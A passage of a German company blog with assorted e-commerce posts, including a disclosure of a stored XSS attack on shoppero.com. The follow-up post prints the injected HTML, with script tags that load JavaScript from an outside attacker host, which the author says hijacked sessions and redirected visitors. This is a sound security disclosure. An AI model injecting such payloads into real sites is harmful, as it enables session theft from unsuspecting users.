MAYFLOWER zertifiziert seine Software-Entwickler für OXID eShop Enterprise Edition

Premiere: alle Entwickler mit OXID eShop Enterprise Edition Zertifizierung

München/Würzburg/Freiburg, 08.10.2007: Das Systemhaus MAYFLOWER und OXID eSales, Hersteller eines PHP-basierten
Shop-Systems der nächsten Generation, geben bekannt, dass alle in der Entwicklung beschäftigten
Mitarbeiter von MAYFLOWER die OXID eShop Enterprise Edition Zertifizierung abgelegt haben. Eine
besondere Expertise hat das Systemhaus in der Entwicklung von webbasierten Anwendungen auf
Basis der Open Source Architektur LAMP (Linux, Apache, MySQL, PHP).

 

Die Zertifizierung baut die bereits vorhandene Kompetenz bei der Realisierung von
E-Commerce Shops und Plattformen weiter aus. Besonders Kunden, die sehr große
Shop-Systeme mit hohen Nutzerzahlen, Transaktionen und Integration in ihre IT-
Umgebung realisieren möchten, können nun auf die Experten von MAYFLOWER zurück greifen.

 

„Mit der Zertifizierung sichern wir die hohe Kompetenz unserer Mitarbeiter und können
so eine exzellente Qualität bei der Realisierung von Enterprise Shop Systemen auf Basis
von OXID eShop für unsere Kunden garantieren“, sagt Johann-Peter Hartmann, einer
der Geschäftsführer von MAYFLOWER. „Ganz gleich, ob Fulfillment, Integration
in SAP-Backends, Social Commerce mit Web2.0 Komponenten oder Multi Malls mit riesigem
Produktsortiment und Mehr-Partner-Anbindung: in der Kombination aus OXID eShop und
MAYFLOWER finden Sie den richtigen Ansprechpartner in Form eines großen Teams, das
auch höchsten Ansprüchen genügt“, ergänzt Björn Schotte, einer der Geschäftsführer
von MAYFLOWER.

 

„Wir freuen uns sehr, dass die Mayflower GmbH als erstes Unternehmen alle Entwickler
für die OXID eShop Enterprise Edition zertifiziert hat. Dies unterstreicht, wie nützlich
und wertvoll eine fundierte Ausbildung und ein einheitlicher Leistungsnachweis für
Partner sind, die OXID eShop Systeme für Enterprise Kunden implementieren“, sagt
Andrea Seeger, Vorstand und Marketingleitung von OXID eSales.

 

 

Über Mayflower

Die Mayflower GmbH ist Deutschlands größter LAMP-Dienstleister.

Eine besondere Expertise hat das Systemhaus in der Entwicklung von
webbasierten Unternehmensanwendungen und E-Commerce Lösungen. Mit
ihrer Marke ThinkPHP fördert die Mayflower GmbH seit Jahren insbesondere
den Einsatz der Skriptsprache PHP im Business-Bereich.

Insgesamt setzt das Unternehmen den Fokus auf vier Geschäftsbereiche:
Premium-Software-Entwicklung, Performance-/Architektur-Consulting,
Schulung/Support und E-Commerce. Die Mayflower GmbH beschäftigt 40 Mitarbeiter
an den Standorten München und Würzburg.

 

Über OXID eSales

OXID eSales ist einer der führenden Hersteller von E-Commerce-Software.
Mit OXID eShop bietet das Unternehmen eine modulare und skalierbare
Internet-Shoppingsoftware mit einem außergewöhnlichen Preis-Leistungsverhältnis.
OXID eShop ist erhältlich in einer Professional Edition für kleine und
mittelständische Händler und einer Enterprise Edition für große Handelsunternehmen.
Sie lässt sich umfassend anpassen und vollständig in Geschäftsprozesse integrieren.
Schnittstellen zu mehr als 30 E-Commerce Partnern wie Produktportalen, Preissuchmaschinen
oder Affiliate-Programmen sorgen dafür, dass der Online-Handel nachhaltig zum Erfolg wird.

OXID Premium Solution Partner: Mayflower als E-Commerce Lösungsprovider

 

Wie ich bereits früher schon einmal angedeutet hatte, folgt nun hier ein wenig schamlose Eigenwerbung in Sachen „Individual- und Standard-Shop-Software“. :-)

 

Wir haben Lars Jankowfsky vor vielen Jahren – 2001, um genau zu sein – auf der International PHP Conference kennen gelernt. Damals erzählte er uns von einer neuartigen Shopsoftware, die in PHP geschrieben ist, und die er zusammen mit seinem Team entwickelt hat. Über die Jahre entwickelte sich ein loser Kontakt, der in den letzten beiden Jahren sehr eng wurde. Kurz und gut, wir halten den OXID e-Sales Shop für einen der besten, webbasierten Shop-Systeme die es zur Zeit auf dem Markt gibt, und der Markt momentan auch eine Bereinigung einläutet. Das Leistungsportfolio von Mayflower ergänzt sich dabei hervorragend mit dem von OXID. Als Spezialisten für webbasierte Software und elektronische Transaktionen können wir ein umfangreiches Portfolio abbilden – von den komplexen DRM-, SOA-, Payment-, AdServer- und LDAP/AD-Schnittstellen bis hin zu ausgefeilten und hoch performanten Architekturen von Webapplikationen und Webservern, gepaart mit dem hervorragenden KnowHow unserer Mitarbeiter bei der Realisierung großer Webapplikationen.

 

Eines dieser großen Projekte haben wir auch im Rahmen von OXID e-Sales realisiert: einen großen Shop für ein bekanntes Medienunternehmen aus Deutschland. In Kürze werden wir hierzu mehr berichten, einstweilen verweise ich auf unsere umfangreiche Referenzliste.

 

Der enge Kontakt zu OXID e-Sales, der vor kurzem auch in einer Security-Konferenz in Litauen mündete, von der auch die litauische Regierung begeistert war, führte nun dazu, dass wir OXID Premium Solution Partner geworden sind. Als solcher zeichnet uns eine besondere Expertise im KnowHow mit dieser Shop-Software aus, die wir gerne in Projekten mit Endkunden oder anderen OXID Partnern ausspielen.

 

Sollte bei Ihnen der Bedarf an Shop-Systemen da sein, so können Sie uns gerne ansprechen. Wir freuen uns auf interessante Gespräche!

Wir waren jung und wir brauchten schnell Datenschutzbestimmungen …

Ich bin gerade noch dabei, die Resonanz im Einzelnen auszuwerten, aber eines nur kurz, weil es wichtig ist: Selbstverständlich geht es bei Shoppero überhaupt nicht darum, dass wir die Userdaten an Dritte verkaufen. Diesen Passus streichen wir am Montag aus den Datenschutzbestimmungen, denn er ist für uns absolut unwichtig. Warum er drin stand? Wir waren jung und brauchten schnell Datenschutzbestimmungen.

 

Nico Lumma in „Am Tag danach“ auf dem shopperco.com Blog.

 

Ich finde es gut, dass dieser Passus gestrichen wird. Es sei noch mal gesagt, dass ich nichts gegen Werbezusendungen Dritter habe, aber dann mit bewusstem Einverständnis der User. Zu „Wir waren jung und brauchten schnell Datenschutzbestimmungen“ will ich jetzt lieber mal nichts sagen, und es auch dabei bewenden lassen. Ich wünsche viel Erfolg zu diesem teils neuartigen Konzept und hoffe, dass shoppero.com erfolgreich sein wird. Jochen Krisch von Exciting E-Commerce erläutert, was an diesem Konzept so besonders ist – ich bin gespannt, ob und wie es sich in der Zukunft bewährt.

 

Grundsätzlich sollte man sich als Nutzer jedoch AGBs, Datenschutzbestimmungen und sonstige Regelungen eines Services, den man in Anspruch nehmen möchte, genau durchlesen, bevor man einen Service in Anspruch nimmt. Und Betreiber sollten die Investition zur Ausarbeitung von AGBs/Datenschutzbestimmungen nicht scheuen, um späteren Ärger zu vermeiden.

Die Sache mit den AGBs und Datenschutzerklärungen

AGBs und Datenschutzbestimmungen sind wichtig, insbesondere bei E-Commerce Diensten. Wenn man sich einmal intensiver damit beschäftigt, stellt man fest, dass man vor jeder Registration bei einem Service sich AGBs und Datenschutzbestimmungen genau durchlesen sollte. Zweifelt man an der Integrität des Betreibers, so lohnen sich Dienste wie spamgourmet.com, die Einmal – E-Mail Adressen zur Verfügung stellen. Bei einigen der Services kann man auch definieren, wie viele E-Mails man zugestellt bekommen möchte (zum Beispiel 2), und danach wird der Account zugemacht.

 

Shoppero ist ja momentan in aller Munde. Grund genug, mal einen Blick in die AGBs zu werfen:

 

§ 6 Datenschutz
Es gelten die Datenschutzbestimmungen des Betreibers.

Aha. Schauen wir in die Datenschutzbestimmungen:

§ 3 Werbung, Markt- und Meinungsforschung, Werbewiderspruch
(1) Der Betreiber ist berechtigt, die personenbezogenen Daten des Nutzers auch zum Zwecke der Werbung und Markt- und Meinungsforschung zu nutzen. Die Werbung kann dabei auch für andere Produkte als diejenigen des Betreibers erfolgen. Auch in diesen Fällen findet der E-Mail-Versand durch den Betreiber statt. Der Nutzer ist insbesondere mit dem Empfang solcher E-Mails einverstanden.
(2) Der Nutzer willigt in die Erhebung, Verarbeitung und Nutzung der Daten zu den vorgenannten Zwecken ein.

§ 4 Einsehbarkeit der Daten durch Dritte, Weitergabe der Daten an Dritte, Verwendung der Daten in anderen Medien
(1) Eine Einsicht des Betreibers in die privaten Online-Kommunikationen der Nutzer findet nicht statt.
(2) Der Nutzer willigt in die Weitergabe seiner E-Mail-Adresse an Vertragspartner des Betreibers zum Zwecke der Werbung für Produkte und Leistungen dieser Vertragspartner, Markt- und Meinungsforschung ein. Die Vertragspartner des Betreibers sind berechtigt, dem Nutzer entsprechende E-Mails zuzusenden und der Nutzer ist mit dem Empfang solcher E-Mails einverstanden. Dieser Weitergabe kann der Nutzer jederzeit, auch nach Erteilung der Einwilligung, mit Wirkung für die Zukunft gemäß § 8 widersprechen. Nach erfolgtem Widerspruch ist eine Weitergabe der E-Mail-Adresse für diese Zwecke unzulässig.
(3) Der Diensteanbieter ist berechtigt, Auskunft an Strafverfolgungsbehörden und Gericht für Zwecke der Strafverfolgung zu erteilen, sofern infolge von Beschwerden begründete Verdacht des Missbrauchs besteht. Ein solcher Missbrauch liegt vor, wenn das Profil unter Verletzung gesetzlicher Vorschriften oder entgegen der Regelungen der AGB des Betreibers genutzt wird.

Ich bin jetzt wirklich kein Experte, aber sowas finde ich doof. Warum kann ich nicht als User explizit und wissentlich nach der Anmeldung sagen „Tolle Sache, ich will Werbung von Euren Vertragspartnern an meine bei Euch registrierte E-Mail Adresse bekommen“? Stattdessen muss ich beim Registrieren des Accounts die AGBs und damit auch diese Datenschutzbestimmungen zunächst einmal einwilligen und kann dann nur später (wenn ich überhaupt davon weiß) das widerrufen.

 

Besonders kundenfreundlich ist das doch nicht. Vielleicht sind aber auch die AGB und Datenschutzbestimmungen noch etwas beta. Lanu hat dafür eine andere Bezeichnung parat.

 

Zum kurzen Vergleich ein Auszug aus den Datenschutzbestimmungen von dealjaeger.de, die laut einem Blogposting bei deutsche-startups.de ja einen ähnlichen Service planen. Wenn ich mir diese Datenschutzbestimmungen anschaue, finde ich die schon wesentlich kundenfreundlicher:

Nutzung und Weitergabe von personenbezogenen Daten

1. Dealjaeger.de verarbeitet und nutzt deine Bestandsdaten vorrangig für die Begründung, inhaltliche Ausgestaltung und Änderung des zwischen dir und Dealjaeger.de bestehenden Vertragsverhältnisses. Die erhobenen Nutzungsdaten nutzt Dealjaeger.de darüber hinaus auch zur bedarfsgerechten Gestaltung deines Benutzerprofils.
2. Mit deiner Einwilligung nutzt Dealjaeger.de deine E-Mail-Adresse für die Versendung von Mitteilungen zur Beratung, zur Werbung für eigene Angebote und zur Marktforschung. Wir weisen dich darauf hin, dass du deine Einwilligung zur Versendung weiterer Nachrichten jederzeit durch eine E-Mail an service@dealjaeger.com widerrufen kannst. Der Widerruf erstreckt sich allerdings nicht auf die Versendung solcher Informationen, die fester Bestandteil der Dienste von Dealjaeger.de sind. Deine Einwilligung speziell zur Zustellung von Newslettern kannst du widerrufen, indem dem dem Link am Fuße jedes Newsletters folgst.
3. Deine personenbezogenen Daten werden von uns vertraulich behandelt. Dealjaeger.de verkauft oder vermietet deine personenbezogenen Daten nicht an Dritte. Eine Weiterleitung deiner Daten an dritte Unternehmen erfolgt nur, wenn dies zum Erhalt oder Ausbau des Angebotes von Dealjaeger.de erforderlich sein sollte. Soweit andere Unternehmen von Dealjaeger.de mit der Erbringung von Diensten für Dealjaeger.de beauftragt werden, z. B. mit der Verarbeitung und Zustellung von Nachrichten, der Erbringung von Kundendiensten oder der Erstellung von statistischen Analysen, werden diese Unternehmen von Dealjaeger.de ebenfalls zur Gewährleistung der Geheimhaltung der übermittelten personenbezogenen Daten verpflichtet und dürfen diese Daten für keinen anderen Zweck als den von uns genannten verwerten.
4. Dealjaeger.de ist verpflichtet, mit Behörden, insbesondere Strafverfolgungsbehörden und Gerichten, zusammenzuarbeiten und kann in diesem Zusammenhang auch genötigt werden, personenbezogene Daten weiterzuleiten, um Anfragen von Ermittlungsbehörden oder Gerichten zu beantworten.
5. Im Rahmen des Vertragsverhältnisses erhobene Bestandsdaten werden in der Regel mit Ablauf des auf die Beendigung des Vertragsverhältnisses folgenden Kalenderjahres gelöscht oder ggf. gesperrt.
6. Bei Verstößen gegen die AGBs oder gegen die geltenden gesetzlichen Bestimmungen sowie bei Verletzung der Rechte Dritter behält sich Dealjaeger.de das Recht vor, die Bestandsdaten seiner Mitglieder auch über die Kündigung oder Sperrung des Benutzerprofils hinaus für einen angemessenen Zeitraum bis zur Klärung des Sachverhalts zu speichern.

 

Klar, niemand ist perfekt, gerade in der heutigen schnelllebigen Zeit, wo neue Services und Websites im Wochentakt ausgespuckt werden. Ich kann daher nur die Verwendung von Diensten wie spamgourmet.com empfehlen. Das tut uns Marketers zwar weh, weil wir nicht wissen wer das da ist, der meinen Service nutzt und man ihn nicht mit Werbung zuballern kann, aber so ist das nun mal. Kunden, die Werbung wollen, sollten überzeugt davon sein, dass sie Werbung haben wollen, und nicht per se den Freibrief zum Werbeempfang per E-Mail geben. Naja, aber vielleicht kann man auch hier noch mal nachlegen und die Bestimmungen etwas kundenfreundlicher gestalten.

Update: Analyse des HTML Sourcecodes der Second Order Attacke

Ein kleines Update zum vorherigen Beitrag: der Nutzer „lars“ schien harmlos zu sein. Schaut man sich den HTML-Quellcode näher an, kommt ein altbekanntes Gesicht zum Vorschein:

		
<div class="listitem searchlists">
		<a href="index.php?action=lists&subaction=show_detail&list_lookup_id=111128">
<img class="listthumb" src="http://s3.amazonaws.com/product_thumbs/" alt="" title=""/></a>
		<span class="listtitle">"><script>alert(1)</script></span><br />

		"><script>alert(1)</script><br />
		<span class="addedby">Erstellt von lars</span>
	</div>
		<div class="listitem searchlists">
		<a href="index.php?action=lists&subaction=show_detail&list_lookup_id=111129">
<img class="listthumb" src="http://s3.amazonaws.com/product_thumbs/" alt="" title=""/></a>
		<span class="listtitle">"><script>alert(1)</script></span><br />

		"><script>alert(1)</script><br />
		<span class="addedby">Erstellt von lars</span>
	</div>
		<div class="listitem searchlists">
		<a href="index.php?action=lists&subaction=show_detail&list_lookup_id=111130">
<img class="listthumb" src="http://s3.amazonaws.com/product_thumbs/" alt="fnord fnord">fnord
<script src=http://o01o.f-4" title="fnord fnord">fnord<script src=http://o01o.f-4"/></a>
		<span class="listtitle">"><script src=http://o01o.f-451.net/a.js></sc</span><br />
		"><script src=http://o01o.f-451.net/a.js></script>foo<br />
		<span class="addedby"><strong>Erstellt von fukami</strong></span>

 

fukami.

shoppero.com gleich erstes Opfer von Second Order XSS Attacks

Ich wollte Nico Lumma zum Launch von shoppero.com beglückwünschen und wie es sich unter Kollegen gehört per E-Mail noch ein paar Verbesserungswünsche (auch aus sicherheitstechnischer Sicht) zum Launch zumailen. Über die Vorstellung eines sogenannten Adgets in einem Blog und der allgemeinen Kritik am Konzept im E-Commerce Blog (die ich übrigens nur bedingt teile, da ich es gut finde, dass neben Adical auch noch der eine oder andere – ähnliche – Mitbewerber auf den Markt kommt) kam ich auf die Empfehlungsseite bei shopper.com. Dann habe ich ein bißchen rumgebrowst und bin u.a. auf der URL http://shoppero.com/index.php?action=lists&subaction=search_by_letter&letter=t (die ich jetzt absichtlich NICHT verlinke: aktuell ist es so, wenn Ihr dort drauf klickt, findet eine Second Order XSS Attacke (persistentes XSS, auch Type-2 XSS genannt – das die Basis für JavaScript-Viren ist, siehe z.B. den MySpace Wurm vor einigen Jahren) von einem registrierten Nutzer statt, der Eure Session entführt, bitte daher also mit einer frischen Browser-Session ohne irgendwelche anderen offenen Tabs/Logins etc. anschauen!) stehen geblieben. Die folgenden Screenshots sollen einfach mal ohne Worte verdeutlichen, wie gefährlich mangelnde Sicherheit sein kann. Nico ist bereits per E-Mail benachrichtigt, und ich gehe davon aus, dass der Nutzer schnell entfernt werden wird und die potenziellen Bugs geschlossen werden.

 

Die Thumbs sind auf die Originalgröße verlinkt.

 



Aufruf der URL. Alles erst mal noch ganz harmlos. Ausgabe der Liste stockt.



Nun wird per XSS ein JS Alert (sieht man hier gerade nicht im Screenshot) ausgegeben.



Meine Session-ID wird angezeigt. Gott sei Dank bin ich nicht dort registriert und auch nicht eingeloggt, sonst hätte der Angreifer eine gültige Session und damit auch möglicherweise einen gültigen Login.



Danach erfolgt ein Redirect auf eine Site des Angreifers.

 

Das war purer Zufall, dass ich diese Second Order XSS Attacke eines anderen Nutzers entdeckt habe. Diese möchte ich hier dokumentieren, um zu verdeutlichen, wie wichtig es gerade im Bereich E-Commerce, in dem es immerhin um Transaktionen und auch Geld geht, ist, seine Site so sicher wie möglich zu machen. Zur Erklärung: die Site ist per se nicht unsicher. In diesem Beispiel ist es so, dass scheinbar der Blätter-/Anzeigemechanismus der Empfehlungen der User anfällig ist für so genannte second order XSS Attacken. Dh. ein Angreifer konnte wohl in Profildaten oder Produktbeschreibungen speziellen JavaScript-Code hinterlassen. Dieser wird dann bei Durchsicht ausgeführt, wenn ein Nutzer auf obige URL klickt. Das ist deswegen möglicherweise so gefährlich, weil die XSS Attacke genau dort auftritt, wo viele Nutzer vermutlich auch hinkommen werden, nämlich beim Durchblättern der User/Angebote. Anders als bei „normalen“ XSS Attacken, wo der Angreifer direkt einen Nutzer zur Ausführung einer URL bringen muss (z.B. durch Versand einer E-Mail oder wie im gestrigen Beispiel Verkürzung einer URL), kann man hier in aller Seelenruhe den Schadcode in die potenziell verwundbare Applikation einbringen und muss dann nur warten, bis die Nutzer auf diese Seite gehen und kann „die Früchte ernten“, also die Nutzersessions.

 

UPDATE: für eine „Analyse“ des HTML-Sourcecodes siehe den Folgebeitrag.

 

UPDATE 2: Auf dem fixmbr Blog, genauer gesagt in den Userkommentaren, scheint man schon bereits gestern Abend auf diese Lücke gestoßen zu sein.

Die Bahn kommt mobil…

Der Fischmarkt berichtet, dass die Bahn nur 17% ihres Umsatzes online (via IWB) generiert. Nicht viel, das ist richtig. Der Kritik über das langsame Buchungssystem kann ich nicht so ganz folgen – ich buche meine Tickets ausschließlich online und hatte bisher noch nie nennenswerte Schwierigkeiten beim Buchen.

 

In jüngster Zeit hatte ich die Gelegenheit, das mobile Bahnticket zu kaufen. Ein netter Nebeneffekt ist, die SchaffnerZugbegleiter damit verwirren zu können. Das tolle daran ist jedoch, dass man damit wirklich wunderbar spontan ein Ticket buchen kann, selbst wenn mal kein Drucker zum Ausdrucken der elektronischen PDF-A4-Tickets zur Verfügung steht. Wenn das Meeting also mal wieder länger dauert, ist das mobile Ticket ein guter Helfer. Leider nur für 1 Person und für einfache Fahrten.

 

Und so geht’s: auf www.bahn.de mit dem eigenen Account einloggen und im Bereich „Buchungsrückschau/Storno: Account verwalten“ den Zugang zu den mobilen Services freischalten. Man registriert dort seine Handynummer und eine selbst definierte PIN, die man dann mit dem Handy/PDA unter mobile.bahn.de nebst Usernamen angeben muss. Nach Suche der Zugverbindung, Auswahl der möglichen Bahncard-Daten sowie einer etwaigen Sitzplatzreservierung und der Wahl des Zahlungsmittels erhält man eine MMS auf das Handy, das als Video-MMS realisiert ist: die ersten zehn Sekunden wird der 2D Barcode, der die relevanten Ticketdaten enthält, angezeigt, die letzten zehn Sekunden enthalten eine Textübersicht der gewählten Strecke (inkl. Gleisangaben, natürlich Abfahrts- und Ankunftszeiten und Sitzplatzreservierungsdaten).

 

Auch hier gibt es wieder Verbesserungsmöglichkeiten: so wäre es nicht schlecht, auch gleich noch die Rückfahrt mit buchen zu können. Und für Firmen besonders interessant: das normale PDF-Ticket könnte gleich direkt per E-Mail zugestellt werden, damit man nicht jedes Mal zunächst das PDF vom eigenen Account herunter laden muss, nur um es an die Buchhaltung weiterzuleiten. Per E-Mail Forward ginge dies schneller.

User Generated Müsli

Via deutsche-startups.de:
„Die erste Wunsch-Müsli-Fabrik Deutschlands ist fertig. Körner- und Cerealienfans können sich bei “mymuesli” nun ihr ganz persönliches Traummüsli zusammenstellen.“

 

User Generated Content einmal anders. Wer dem Einheitsbrei der diversen Müsli-Sorten aus dem Handel entfliehen möchte, ist bei mymuesli genau richtig. Hier kann man nach Lust und Laune seine eigene Müsli-Mischung zusammenstellen, dem Mix einen eigenen Namen geben und schon kommt die Dose mit der eigenen Mischung ins Haus. deutsche-startups.de hat noch ein paar Informationen zu den Preisen: „Ein simples Fünf-Körner-Müsli kostet 3,90 Euro, ein Schokomüsli mit Feigen 4,25 Euro, ein Tropica-Müsli mit Mangostückchen, Aprikosen, Ananas, Gojibeeren, Sultana-Chocs und Macadamia-Nüssen hingegen 8,25 Euro. Insgesamt können die Nutzer aus 75 Zutaten wählen.“

 

Interessant ist auch die Idee, dass der eigene Müsli-Mix eine Mix-ID bekommt, die andere Personen sich dann online anschauen lassen. Bei der Realisation merkt man jedoch, dass die Seite noch am Anfang steht: zwar gibt es eine Mix-Liste von bereits bestellten Müslis mit Empfehlungs-Funktion, „In den Warenkorb“-Einkaufsfunktion und zusätzlich einem Widget-Generator zur Einbindung des eigenen Müsli-Mixes in z.B. Blogs und andere externen Seiten. Bis zur Entwicklung einer entsprechenden Social Commerce Community mit entsprechenden Funktionalitäten ist es jedoch noch ein wenig hin, aber vielleicht ergibt sich das ja noch in der Zukunft? Hier könnte sich das Startup noch einige Dinge von anderen Social Commerce Startup abschauen. Eine kleine FAQ steht ebenfalls parat, in der die wichtigsten Fragen rund um das Wunsch-Müsli und das Angebot von mymuesli geklärt werden.

 

Die Story ist dann auch schnell erzählt: „Die Geschichte unseres eigenen Bio-Müslis hat mit einer Autofahrt begonnen: Wir waren auf dem Weg zum Badesee und hörten den Radiospot einer bekannten Müslifirma aus dem Odenwald. Ein paar Stunden später waren wir uns dann einig. Nicht nur sollten wir bessere Radiowerbung machen – warum nicht gleich ein besseres Müsli? Biologisch sollte es sein, ohne zugesetzte Aroma- oder Farbstoffe, außerdem zuckerfrei. Vor allem aber individuell zusammenstellbar.“

 

Hier: Beispiel eines Müsli-Widgets vom „apple addict“ bei mymuesli.com inklusive Einblendung der Zutaten. Aktiviertes JavaScript ist hierbei Voraussetzung. Das Widget erscheint noch ein wenig spartanisch, der Aufruf zum Kaufen dieser Müsli-Mischung fehlt ebenso wie Links zum Weiterempfehlen. Aber die nächste Version ist bestimmt schon in Entwicklung :-)

 

Natürlich darf auch ein Blog nicht fehlen. Wir wünschen dem Startup viel Erfolg!

Neue Kategorie: E-Commerce

Es gibt in unserem Weblog nun eine neue Kategorie: E-Commerce. Von Zeit zu Zeit wollen wir E-Commerce Themen aufgreifen, nicht nur rein technischer Natur, sondern auch Position beziehen. Als Unternehmen, dass auf die Entwicklung von Webapplikationen spezialisiert ist, ist uns der Bereich E-Commerce schon seit einigen Jahren ein steter Begleiter in unseren Projekten. In Zukunft wird es hier auch mehr von uns zu hören geben.

 

In der Blogosphere möchte ich mich auch im Speziellen bei Jochen Krisch für sein Exciting E-Commerce Blog sowie bei Michael Jung & Daniel Schäfer für das E-Commerce Blog bedanken. Beide Blogs gehören für mich zum täglichen Lesefutter im Bereich E-Commerce, was im Übrigen auch sehr inspirierend wirkt.

SOAP API of spreadshirt.net

I just came across an old entry of the Exciting Ecommerce blog (German) which tells that Spreadshirt.net, one of Germany’s hottest Internet startups, has a SOAP interface. spreadshirt.net itself seems to be developed in PHP, and so I started my IDE and played a bit with it.

At the moment, it seems to be just a bit of a playground. Some lines of code are good enough to start:

<?php
$wsdl = 'http://www.spreadshirt.net/services.php?wsdl';

$client = new SoapClient($wsdl, array('exceptions' => 0, 'trace' => 1));

$session_token = $client->initialize_session(62466);

$s = microtime(true);
$articles = $client->get_articles($session_token, 62466);
$e = microtime(true);

$d = $e-$s;

print "Duration: $d<br />";
var_dump($articles);

But as I said, Spreadshirt needs some more work here – it takes roughly 40-60 seconds to get all the articles (about 300) of this shop. This is definitely too long for creating small applications like shopping widgets etc.